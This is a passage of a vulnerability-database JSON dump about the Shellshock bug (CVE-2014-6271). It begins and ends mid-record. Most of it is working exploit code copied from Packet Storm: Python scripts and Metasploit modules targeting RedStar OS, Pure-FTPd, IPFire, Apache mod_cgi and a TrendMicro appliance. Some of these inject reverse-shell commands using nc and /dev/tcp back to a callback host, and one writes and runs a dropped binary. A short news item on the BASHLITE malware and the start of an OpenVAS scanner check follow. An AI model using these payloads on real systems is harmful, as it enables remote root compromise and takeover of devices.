\n# \n# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080 \n# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit \n# [-] exploiting shellshock CVE-2014-6271... \n# sh: no job control in this shell \n# sh-4.1# id \n# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023 \n# sh-4.1# \n# \n# -- Hacker Fantastic (https://myhackerhouse.com) \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport subprocess \nimport requests \nimport sys \nimport os \n \ndef spawn_shell(cbport): \nsubprocess.call('nc -l ' + cbport, shell=True) \n \ndef shellshock(soft,ip,port,cbip,cbport): \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nif soft == \"beam\": \nuser_agent = {'User-agent': '() { :; }; /bin/bash -c \"rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f\"'} \nelse: \nshellstring = '() { :; }; /bin/bash -c \"%s\"' % (cbip) \nuser_agent = {'User-agent': shellstring} \nprint \"[-] exploiting shellshock CVE-2014-6271...\" \nmyreq = requests.get(\"https://\"+ip+\":\"+port+\"/session_login.cgi\", headers = user_agent, verify=False) \n \nif __name__ == \"__main__\": \nprint \"[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit\" \nif len(sys.argv) < 5: \nprint \"[-] Use with <beam> <host> <port> <connectback ip> <connectback port>\" \nprint \"[-] Or with <rssmon> <host> <port> <cmd>\" \nsys.exit() \nif(sys.argv[1]==\"beam\"): \nnewRef=os.fork() \nif newRef==0: \nshellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5]) \nelse: \nspawn_shell(sys.argv[5]) \nelse: \nshellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140205/rsshellshock.py.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:10", "bulletinFamily": "exploit", "description": "", "modified": "2014-10-02T00:00:00", "published": "2014-10-02T00:00:00", "href": "https://packetstormsecurity.com/files/128522/Pure-FTPd-External-Authentication-Bash-Environment-Variable-Code-Injection.html", "id": "PACKETSTORM:128522", "type": "packetstorm", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection', \n'Description' => %q( \nThis module exploits the code injection flaw known as shellshock which \nleverages specially crafted environment variables in Bash. This exploit \nspecifically targets Pure-FTPd when configured to use an external \nprogram for authentication. \n), \n'Author' => \n[ \n'Stephane Chazelas', # Vulnerability discovery \n'Frank Denis', # Discovery of Pure-FTPd attack vector \n'Spencer McIntyre' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2014-6271'], \n['OSVDB', '112004'], \n['EDB', '34765'], \n['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc'] \n], \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 2048 \n}, \n'Targets' => \n[ \n[ 'Linux x86', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'CmdStagerFlavor' => :printf \n} \n], \n[ 'Linux x86_64', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86_64, \n'CmdStagerFlavor' => :printf \n} \n] \n], \n'DefaultOptions' => \n{ \n'PrependFork' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 24 2014')) \nregister_options( \n[ \nOpt::RPORT(21), \nOptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) \n], self.class) \nderegister_options('FTPUSER', 'FTPPASS') \nend \n \ndef check \n# this check method tries to use the vulnerability to bypass the login \nusername = rand_text_alphanumeric(rand(20) + 1) \nrandom_id = (rand(100) + 1) \ncommand = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\" \nif send_command(username, command) =~ /^2\\d\\d ok./i \nreturn CheckCode::Safe if banner !~ /pure-ftpd/i \ndisconnect \n \ncommand = \"echo auth_ok:0; echo end\" \nif send_command(username, command) =~ /^5\\d\\d login authentication failed/i \nreturn CheckCode::Vulnerable \nend \nend \ndisconnect \n \nCheckCode::Safe \nend \n \ndef execute_command(cmd, _opts) \ncmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\") \nusername = rand_text_alphanumeric(rand(20) + 1) \nsend_command(username, cmd) \nend \n \ndef exploit \n# Cannot use generic/shell_reverse_tcp inside an elf \n# Checking before proceeds \nif generate_payload_exe.blank? \nfail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\") \nend \n \nexecute_cmdstager(linemax: 500) \nhandler \nend \n \ndef send_command(username, cmd) \ncmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\" \nconnect \nsend_user(username) \npassword_result = send_pass(cmd) \ndisconnect \npassword_result \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128522/pureftpd_bash_env_exec.rb.txt"}, {"lastseen": "2016-12-05T22:17:28", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-30T00:00:00", "published": "2014-09-30T00:00:00", "href": "https://packetstormsecurity.com/files/128482/IPFire-2.15-Bash-Command-Injection.html", "id": "PACKETSTORM:128482", "type": "packetstorm", "title": "IPFire 2.15 Bash Command Injection", "sourceData": "`#!/usr/bin/env python \n# \n# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock) \n# \n# Exploit Author : Claudio Viviani \n# \n# Vendor Homepage : http://www.ipfire.org \n# \n# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso \n# \n# Date : 2014-09-29 \n# \n# Fixed version: IPFire 2.15 core 83 (2014-09-28) \n# \n# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance. \n# It can be maintained via a web interface. \n# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server. \n# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop. \n# \n# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection \n# (CVE-2014-6271) \n# \n# Suggestion: \n# \n# If you can't update the distro and you have installed ipfire via image files (Arm, Flash) \n# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire) \n# \n# \n# http connection \nimport urllib2 \n# Basic Auth management Base64 \nimport base64 \n# Args management \nimport optparse \n# Error management \nimport sys \n \nbanner = \"\"\" \n___ _______ _______ __ _______ __ \n| | _ | _ |__.----.-----. | _ .-----|__| \n|. |. 1 |. 1___| | _| -__| |. 1___| _ | | \n|. |. ____|. __) |__|__| |_____| |. |___|___ |__| \n|: |: | |: | |: 1 |_____| \n|::.|::.| |::.| |::.. . | \n`---`---' `---' `-------' \n_______ __ __ __ _______ __ __ \n| _ | |--.-----| | | _ | |--.-----.----| |--. \n| 1___| | -__| | | 1___| | _ | __| < \n|____ |__|__|_____|__|__|____ |__|__|_____|____|__|__| \n|: 1 | |: 1 | \n|::.. . | |::.. . | \n`-------' `-------' \n \nIPFire <= 2.15 c0re 82 Authenticated \nCgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n \n \nWritten by: \n \nClaudio Viviani \n \nhttp://www.homelab.it \n \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \nhttps://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww \n\"\"\" \n \n# Check url \ndef checkurl(url): \nif url[:8] != \"https://\" and url[:7] != \"http://\": \nprint('[X] You must insert http:// or https:// procotol') \nsys.exit(1) \nelse: \nreturn url \n \ndef connectionScan(url,user,pwd,cmd): \nprint '[+] Connection in progress...' \ntry: \nresponse = urllib2.Request(url) \ncontent = urllib2.urlopen(response) \nprint '[X] IPFire Basic Authentication not found' \nexcept urllib2.HTTPError, e: \nif e.code == 404: \nprint '[X] Page not found' \nelif e.code == 401: \ntry: \nprint '[+] Authentication in progress...' \nbase64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\\n', '') \nheaders = {'VULN' : '() { :;}; echo \"H0m3l4b1t\"; /bin/bash -c \"'+cmd+'\"' } \nresponse = urllib2.Request(url, None, headers) \nresponse.add_header(\"Authorization\", \"Basic %s\" % base64string) \ncontent = urllib2.urlopen(response).read() \nif \"ipfire\" in content: \nprint '[+] Username & Password: OK' \nprint '[+] Checking for vulnerability...' \nif 'H0m3l4b1t' in content: \nprint '[!] Command \"'+cmd+'\": INJECTED!' \nelse: \nprint '[X] Not Vulnerable :(' \nelse: \nprint '[X] No IPFire page found' \nexcept urllib2.HTTPError, e: \nif e.code == 401: \nprint '[X] Wrong username or password' \nelse: \nprint '[X] HTTP Error: '+str(e.code) \nexcept urllib2.URLError: \nprint '[X] Connection Error' \nelse: \nprint '[X] HTTP Error: '+str(e.code) \nexcept urllib2.URLError: \nprint '[X] Connection Error' \n \ncommandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c \"touch /tmp/test.txt\"') \ncommandList.add_option('-t', '--target', action=\"store\", \nhelp=\"Insert TARGET URL\", \n) \ncommandList.add_option('-c', '--cmd', action=\"store\", \nhelp=\"Insert command name\", \n) \ncommandList.add_option('-u', '--user', action=\"store\", \nhelp=\"Insert username\", \n) \ncommandList.add_option('-p', '--pwd', action=\"store\", \nhelp=\"Insert password\", \n) \noptions, remainder = commandList.parse_args() \n \n# Check args \nif not options.target or not options.cmd or not options.user or not options.pwd: \nprint(banner) \ncommandList.print_help() \nsys.exit(1) \n \nprint(banner) \n \nurl = checkurl(options.target) \ncmd = options.cmd \nuser = options.user \npwd = options.pwd \n \nconnectionScan(url,user,pwd,cmd) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128482/ipfire_cgi_shellshock.py.txt"}, {"lastseen": "2016-12-05T22:23:50", "bulletinFamily": "exploit", "description": "", "modified": "2016-06-09T00:00:00", "published": "2016-06-09T00:00:00", "href": "https://packetstormsecurity.com/files/137376/IPFire-Bash-Environment-Variable-Injection-Shellshock.html", "id": "PACKETSTORM:137376", "type": "packetstorm", "title": "IPFire Bash Environment Variable Injection (Shellshock)", "sourceData": "`## \n## This module requires Metasploit: http://metasploit.com/download \n## Current source: https://github.com/rapid7/metasploit-framework \n### \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)', \n'Description' => %q( \nIPFire, a free linux based open source firewall distribution, \nversion <= 2.15 Update Core 82 contains an authenticated remote \ncommand execution vulnerability via shellshock in the request headers. \n), \n'Author' => \n[ \n'h00die <mike@stcyrsecurity.com>', # module \n'Claudio Viviani' # discovery \n], \n'References' => \n[ \n[ 'EDB', '34839' ], \n[ 'CVE', '2014-6271'] \n], \n'License' => MSF_LICENSE, \n'Platform' => %w( linux unix ), \n'Privileged' => false, \n'DefaultOptions' => \n{ \n'SSL' => true, \n'PAYLOAD' => 'cmd/unix/generic' \n}, \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic' \n} \n}, \n'Targets' => \n[ \n[ 'Automatic Target', {}] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 29 2014' \n) \n) \n \nregister_options( \n[ \nOptString.new('USERNAME', [ true, 'User to login with', 'admin']), \nOptString.new('PASSWORD', [ false, 'Password to login with', '']), \nOpt::RPORT(444) \n], self.class \n) \nend \n \ndef check \nbegin \nres = send_request_cgi( \n'uri' => '/cgi-bin/index.cgi', \n'method' => 'GET' \n) \nfail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil? \nfail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code == 401 \n/\\<strong\\>IPFire (?<version>[\\d.]{4}) \\([\\w]+\\) - Core Update (?<update>[\\d]+)/ =~ res.body \n \nif version && update && version == \"2.15\" && update.to_i < 83 \nExploit::CheckCode::Appears \nelse \nExploit::CheckCode::Safe \nend \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\") \nend \nend \n \n# \n# CVE-2014-6271 \n# \ndef cve_2014_6271(cmd) \n%{() { :;}; /bin/bash -c \"#{cmd}\" } \nend \n \ndef exploit \nbegin \npayload = cve_2014_6271(datastore['CMD']) \nvprint_status(\"Exploiting with payload: #{payload}\") \nres = send_request_cgi( \n'uri' => '/cgi-bin/index.cgi', \n'method' => 'GET', \n'headers' => { 'VULN' => payload } \n) \n \nfail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil? \nfail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code == 401 \n/<li>Device: \\/dev\\/(?<output>.+) reports/m =~ res.body \nprint_good(output) unless output.nil? \n \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\") \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137376/ipfire_bashbug_exec.rb.txt"}, {"lastseen": "2016-12-05T22:14:09", "bulletinFamily": "exploit", "description": "", "modified": "2014-10-03T00:00:00", "published": "2014-10-03T00:00:00", "href": "https://packetstormsecurity.com/files/128554/Shellshock-Bashed-CGI-RCE.html", "id": "PACKETSTORM:128554", "type": "packetstorm", "title": "Shellshock Bashed CGI RCE", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Shellshock Bashed CGI RCE', \n'Description' => %q{ \nThis module exploits the shellshock vulnerability in apache cgi. It allows you to \nexcute any metasploit payload you want. \n}, \n'Author' => \n[ \n'Stephane Chazelas', # vuln discovery \n'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6271' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\", \n}, \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Aug 13 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) , \nOptString.new('FILEPATH', [true, 'The url ', '/tmp']) \n], self.class) \nend \n \ndef exploit \n@payload_name = \"#{rand_text_alpha(5)}\" \nfull_path = datastore['FILEPATH'] + '/' + @payload_name \npayload_exe = generate_payload_exe \nif payload_exe.blank? \nfail_with(Failure::BadConfig, \"#{peer} - Failed to generate the ELF, select a native payload\") \nend \npeer = \"#{rhost}:#{rport}\" \nprint_status(\"#{peer} - Creating payload #{full_path}\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => datastore['TARGETURI'], \n'agent' => \"() { :;}; /bin/bash -c \\\"\" + \"printf \" + \"\\'\" + Rex::Text.hexify(payload_exe).gsub(\"\\n\",'') + \"\\'\" + \"> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\\\"\" \n}) \nend \nend`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128554/shellshock_rce.rb.txt"}, {"lastseen": "2016-12-05T22:13:54", "bulletinFamily": "exploit", "description": "", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "https://packetstormsecurity.com/files/139304/TrendMicro-InterScan-Web-Security-Virtual-Appliance-Shellshock.html", "id": "PACKETSTORM:139304", "type": "packetstorm", "title": "TrendMicro InterScan Web Security Virtual Appliance Shellshock", "sourceData": "`#!/usr/bin/env python \n# TrendMicro InterScan Web Security Virtul Appliance \n# ================================================== \n# InterScan Web Security is a software virtual appliance that \n# dynamically protects against the ever-growing flood of web \n# threats at the Internet gateway exclusively designed to secure \n# you against traditional and emerging web threats at the Internet \n# gateway. The appliance however is shipped with a vulnerable \n# version of Bash susceptible to shellshock (I know right?). An \n# attacker can exploit this vulnerability by calling the CGI \n# shellscript \"/cgi-bin/cgiCmdNotify\" which can be exploited \n# to perform arbitrary code execution. A limitation of this \n# vulnerability is that the attacker must have credentials for \n# the admin web interface to exploit this flaw. The panel runs \n# over HTTP by default so a man-in-the-middle attack could be \n# used to gain credentials and compromise the appliance. \n# \n# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1 \n# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit \n# [-] Authenticating to '192.168.56.101' with 'admin' 'password' \n# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA \n# [-] exploiting shellshock CVE-2014-6271... \n# bash: no job control in this shell \n# bash-4.1$ id \n# uid=498(iscan) gid=499(iscan) groups=499(iscan) \n# \n# -- Hacker Fantastic \n# \n# (https://www.myhackerhouse.com) \nimport SimpleHTTPServer \nimport subprocess \nimport requests \nimport sys \nimport os \n \ndef spawn_listener(): \nos.system(\"nc -l 8080\") \n \ndef shellshock(ip,session,cbip): \nuser_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'} \ncookies = {'JSESSIONID': session} \nprint \"[-] exploiting shellshock CVE-2014-6271...\" \nmyreq = requests.get(\"http://\"+ip+\":1812/cgi-bin/cgiCmdNotify\", headers = user_agent, cookies = cookies) \n \ndef login_http(ip,user,password): \nmydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'} \nprint \"[-] Authenticating to '%s' with '%s' '%s'\" % (ip,user,password) \nmyreq = requests.post(\"http://\"+ip+\":1812/uilogonsubmit.jsp\", data=mydata) \nsession_cookie = myreq.history[0].cookies.get('JSESSIONID') \nprint \"[-] JSESSIONID = %s\" % session_cookie \nreturn session_cookie \n \nif __name__ == \"__main__\": \nprint \"[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit\" \nif len(sys.argv) < 5: \nprint \"[-] use with <ip> <user> <pass> <connectback_ip>\" \nsys.exit() \nnewRef=os.fork() \nif newRef==0: \nspawn_listener() \nelse: \nsession = login_http(sys.argv[1],sys.argv[2],sys.argv[3]) \nshellshock(sys.argv[1],session,sys.argv[4]) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139304/trendmicro_IWSVA_shellshock.py.txt"}, {"lastseen": "2016-12-05T22:15:12", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "href": "https://packetstormsecurity.com/files/128447/Apache-mod_cgi-Bash-Environment-Variable-Code-Injection.html", "id": "PACKETSTORM:128447", "type": "packetstorm", "title": "Apache mod_cgi Bash Environment Variable Code Injection", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection', \n'Description' => %q{ \nThis module exploits a code injection in specially crafted environment \nvariables in Bash, specifically targeting Apache mod_cgi scripts through \nthe HTTP_USER_AGENT variable. \n}, \n'Author' => [ \n'Stephane Chazelas', # Vulnerability discovery \n'wvu', # Original Metasploit aux module \n'juan vazquez' # Allow wvu's module to get native sessions \n], \n'References' => [ \n['CVE', '2014-6271'], \n['URL', 'https://access.redhat.com/articles/1200223'], \n['URL', 'http://seclists.org/oss-sec/2014/q3/649'] \n], \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 2048 \n}, \n'Targets' => \n[ \n[ 'Linux x86', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'CmdStagerFlavor' => [ :echo, :printf ] \n} \n], \n[ 'Linux x86_64', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86_64, \n'CmdStagerFlavor' => [ :echo, :printf ] \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 24 2014', \n'License' => MSF_LICENSE \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path to CGI script']), \nOptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]), \nOptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]), \nOptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']), \nOptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]) \n], self.class) \nend \n \ndef check \nres = req(\"echo #{marker}\") \n \nif res && res.body.include?(marker * 3) \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \n# Cannot use generic/shell_reverse_tcp inside an elf \n# Checking before proceeds \nif generate_payload_exe.blank? \nfail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\") \nend \n \nexecute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true) \n \n# A last chance after the cmdstager \n# Trying to make it generic \nunless session_created? \nreq(\"#{stager_instance.instance_variable_get(\"@tempdir\")}#{stager_instance.instance_variable_get(\"@var_elf\")}\") \nend \nend \n \ndef execute_command(cmd, opts) \ncmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\") \n \nreq(cmd) \nend \n \ndef req(cmd) \nsend_request_cgi( \n{ \n'method' => datastore['METHOD'], \n'uri' => normalize_uri(target_uri.path.to_s), \n'agent' => \"() { :;};echo #{marker}$(#{cmd})#{marker}\" \n}, datastore['TIMEOUT']) \nend \n \ndef marker \n@marker ||= rand_text_alphanumeric(rand(42) + 1) \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128447/apache_mod_cgi_bash_env_exec.rb.txt"}], "thn": [{"lastseen": "2018-01-27T09:18:21", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-bR4iJkOSm1s/VGn-ljOts_I/AAAAAAAAg-M/7sXxW74yzhU/s1600/ShellShock-BASHLITE.jpg>)\n\nCyber criminals are using new malware variants by exploiting GNU [Bash vulnerability](<https://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html>) referred to as [ShellShock](<https://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html>) (**_CVE-2014-6271_**) in order to infect embedded devices running **_BusyBox_** software, according to a researcher.\n\n \n\n\nA new variant of \"**Bashlite**\" [malware](<https://thehackernews.com/search/label/Malware>) targeting devices running BusyBox software was spotted by the researchers at Trend Micro shortly after the public disclosure of the ShellShock vulnerability. \n\n \n\n\nBusyBox provides set of command line utilities that are specifically designed to run in constrained embedded environments. At compile time, different capabilities can be left out, reducing the size of the binaries, and efforts are made to make them memory efficient. This makes the software an excellent candidate for use in consumer electronics devices, which seem to have been the items of interest in this case.\n\n \n\n\nThe malware variant, detected as **_ELF_BASHLITE.A (ELF_FLOODER.W)_**, when executed on victim's machine, scans compromised networks for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords.\n\n \n\n\nThe variant would then run a command to download and run bin.sh and bin2.sh scripts to gain control over Busybox systems once a connection was established. Therefore, this newer version of Bashlite is designed not only to identify systems running BusyBox, but also to hijack them.\n\n> \"_Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive_,\" threat response engineer at Trend Micro, Rhena Inocencio wrote on a [blog post](<http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/>).\n\n> \"_As such, a remote attacker can issue commands or download other files on the devices thus compromising its security._\"\n\nMiscreants attempted to log in using a predefined list of usernames which include 'root', 'admin' and 'support' and common and default list of passwords such as 'root,' 'admin,' '12345,' 'pass,' 'password,' '123456' and so on. \n\n \n\n\nTrend Micro's Inocencio urged users to change their default usernames and passwords in order to keep them on the safer side, and also to disable remote shells, if possible, to avoid its exploitation.\n\n \n\n\n**Bashlite** malware includes the payload of the ShellShock exploit code and threat actors have used this critical ShellShock Bash command vulnerability (CVE-2014-6271) to build [botnets from hijacked devices](<https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html>), launch [distributed denial-of-service (DDoS) attacks](<https://thehackernews.com/search/label/ddos%20attack>), and target network attached storage boxes among other exploits.\n\n \n\n\nThe Critical ShellShock Bash bug was disclosed on September 24 and by September 30 security firms estimated that attacks using the exploit could top 1 billion, and more than 1000 organizations patched the ShellShock bug as fixes became available.\n", "modified": "2014-11-17T14:01:23", "published": "2014-11-17T03:01:00", "id": "THN:EC04962528DE0054EC31C2501125E303", "href": "https://thehackernews.com/2014/11/bashlite-malware-leverages-shellshock.html", "type": "thn", "title": "BASHLITE Malware leverages ShellShock Bug to Hijack Devices Running BusyBox", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-02T14:32:45", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120077", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120077", "title": "Amazon Linux Local Check: ALAS-2014-418", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-418.nasl 6735 2017-07-17 09:56:49Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120077\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:16:54 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-418\");\n script_tag(name:\"insight\", value:\"This ALAS is superseded by ALAS-2014-419. A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.We'd like to also give credit to our colleagues at Red Hat for their excellent blog post summarizing this issue. This ALAS is superseded by ALAS-2014-419.\");\n script_tag(name:\"solution\", value:\"Run yum update bash to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-418.html\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n 